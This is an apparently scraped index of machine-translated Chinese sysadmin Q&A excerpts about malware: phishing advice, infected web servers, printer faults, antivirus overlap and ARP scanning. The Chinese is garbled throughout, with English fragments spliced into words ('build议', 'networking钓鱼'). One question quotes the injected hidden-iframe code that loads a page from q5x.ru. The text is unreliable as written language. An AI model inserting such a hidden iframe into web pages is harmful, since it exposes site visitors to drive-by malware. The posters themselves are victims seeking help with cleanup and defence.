Articles of 恶意软件

避免病毒101

我期待发送一封电子邮件给我的用户,给他们build议避免收到病毒和networking钓鱼电子邮件。 我发现http://www.sonicwall.com/furl/phishing/这是有点过时,主要是钓鱼,但仍然适用于病毒。 有没有人有一个新的指导教育用户在病毒和networking钓鱼电子邮件? 谢谢

重build或修理?

可能重复: 更新恶意软件清理技巧 前几天我有一个关于损坏的系统的争论。 如果一个系统难以根除病毒等,或者被软件安装等破坏,你是否主张重build系统或试图修复它?

Linux服务器上的木马下载程序的常见原因是什么?

在我负责的几个networking服务器有一个JavaScript病毒,根据我使用的防病毒木马下载程序。 这是一个缩小的JavaScript,在服务器请求的每一页的底部。 我不知道原因是什么 我怎样才能防止这种情况再次发生?

find恶意软件的来源?

我有一个运行lighttpd(freebsd 6.2-RELEASE(yea,旧)机器上的1.4.19)旧版本的服务器,谷歌提醒我,它已经发现embedded在我的服务器的网页之一的恶意软件。 它恰好是我们的索引页面。 我立即删除了恶意软件,并开始查看服务器日志,了解它如何到达那里。 在正在编辑的文件的任何日志中没有任何痕迹,我注意到索引页的所有者已经被更改为www,这是lighttpd用户。 然后我得出这样的结论,那种软件版本必须存在某种可能性,并且立即升级到1.4.26。 现在恶意软件又回来了。 我已经开始用ftp,lighttpd和所有的login尝试,看看这个脚本是如何进入一些相当详细的服务器日志logging。他们有任何build议,采取其他的方法?

惠普打印机故障(病毒?)

我有几个惠普打印机严重的问题。 问题如下:我的打印机(不同型号)在纸张的第一行打印随机ASCII字符(图片样本: http : //tinyurl.com/d2744sk ),并打印多份文件(50+) 而在这里的另一个截图的打印队列: http : //tinyurl.com/cvxeo6n前2是ascii“打印”。 问题是在不同的打印机型号上(但只有惠普)和不同的机构上有一些共同的个人身份,但两者之间没有任何联系。 大楼在几英里之外。 我怀疑有些用户通过USB密钥传播病毒。 我运行一个完整的系统扫描与几个防病毒没有结果。 我正在更新打印机固件,如果可用的话,我们说。 考虑到: – All models seems to be vulnerable: Laser and InkJet – Antivirus can't find anything – Driver and firmware are updated to the latest version – The printer function properly but every 1 or 2 prints starts printing ascii […]

我是否需要将防病毒和反间谍软件部署到我networking上的所有PC上?

我已经在我们所有的PC上使用防病毒软件,当然,我们正在使用防火墙。 像adaware这样的反间谍软件还能提供额外的好处,还是现代的防病毒/防火墙软件解决了这个问题?

网站攻击与隐藏的iframe(q5x.ru)

我的一个网站最近感染了某种types的攻击,涉及注入一个隐藏的iframe,它的来源是来自一个网站q5x.ru(不链接)。 谷歌的search并没有帮助我弄清楚这个攻击是如何发生的,所以我想知道你们中的任何一个人是否也遇到过这个问题? iframe代码是这样的: <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe> 根据请求,我正在运行一个ASP.Net网站的数据库,至于表单,显然是用于回发的ASP.Net表单。

我们是否需要Eset和SuperAntiSpyware?

我们公司几年前有一个不好的病毒经验。 可能因此,每台电脑都安装了Eset Nod&SuperAntiSpyware。 我认为这是过分的,Eset应该允许自己有足够的保护。 是否有充分的理由都安装在所有的电脑上?

当蠕虫感染所有东西时,你会做什么?

我总是想知道,如果病毒或蠕虫事件影响主文件服务器,我们该怎么办? 如果从文件服务器的客户端感染了蠕虫/病毒呢? 你将如何清理它? 你甚至可以在一个有防病毒的妥协环境中开始工作?

为什么电脑扫描networking?

我通过Wireshark发现了我的子网扫描networking中的一台计算机(为我的子网中的每个IP地址发送ARP,即使没有这样的地址的计算机)。 它无限重复。 这台电脑每秒约有200个ARP。 10.162.4.41广播ARP 60谁有10.162.118.186? 告诉10.162.4.41 我们已经扫描了这台电脑与几个杀毒软件,并没有发现一个恶意软件。 软件上的软件可以做无限扫描吗?